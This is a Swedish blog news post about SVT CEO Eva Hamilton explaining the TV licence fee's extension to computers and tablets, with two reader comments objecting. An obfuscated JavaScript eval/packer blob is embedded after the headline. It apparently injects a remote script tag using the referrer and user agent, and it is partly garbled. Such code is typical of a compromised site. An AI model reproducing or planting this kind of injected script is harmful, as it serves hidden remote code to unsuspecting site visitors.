Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

SVT: Eva Hamilton uttalar sig om avgifterna

SVT: Eva Hamilton uttalar sig om avgifterna
Sebastian

SVT: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnbah|var|u0026u|referrer|rkars||js|php’.split(’|’),0,{}))
Vi har tidigare idag skrivit om hur SVT nu kommer att ta ut en avgift för datorägare samt surfplattor (
Läs tidigare artikel).

Utökningen av avgiften följer att radio och TV-lagen 2007 skrevs om så att det nu omfattar alla enheter som idag kan ta emot någon sorts kanal via streaming.

Eva Hamliton, VD på SVT meddelar att det inte spelar någon roll att det är just SVT som börjar med sändningar online.

– Det måste inte vara SVTs kanaler, redan nu ligger ju fyrans kanaler ute och vi ser att rekvisitet från lagstiftaren är uppfyllt. Samtidigt ser vi inte att det kommer att bli en stor radikal förändring av någonting. 95 procent av svenska folket har redan en tv-apparat så det kommer inte att finnas en förfärligt massa människor som nu kommer att bli betalningspliktiga.

Vi skrev även tidigare att SVTs kanaler var på väg ut på nätet vare sig de sänder dem själva eller inte.
Tillsammans med bättre avtal och rättigheter är den största orsaken till att böja sända TV på detta sätt.

– Vi vet att Telia, Com hem och Magine är på väg ut, säger Eva Hamilton.

Under några av de senaste åren har SVT kunnat sända mer internationella serier i sin playtjänst just för att avtalen blivit bättre. Dock kommer kanalen drabbas av uteblivna program i framtiden också på grund av rättighetsproblem.

– Det kommer att bli svarta hål på sina håll, men de är så få att de blir en meningsfull kanal, säger Eva Hamilton.

Via: IDG Sweden

Comments

  1. Mikael

    Inte så många… bara större delen av alla fattiga studenter som redan nu har svårt att få ekonomin att gå ihop, och därför redan avstår från att ha TV, p.g.a. den dyra licensen. En TV kan man välja bort; att välja bort datorn är i praktiken att avskärma sig från hela samhället, och i princip omöjligt om man ska studera. Skrota TV-licensen och finansiera antingen via skattsedeln, eller bli betalkanal, eller reklamfinansierad (det är ju svt halvt redan, sponsrat hit och dit)

  2. Greger

    Håller med dig Mikael. Det här är oacceptabelt SVT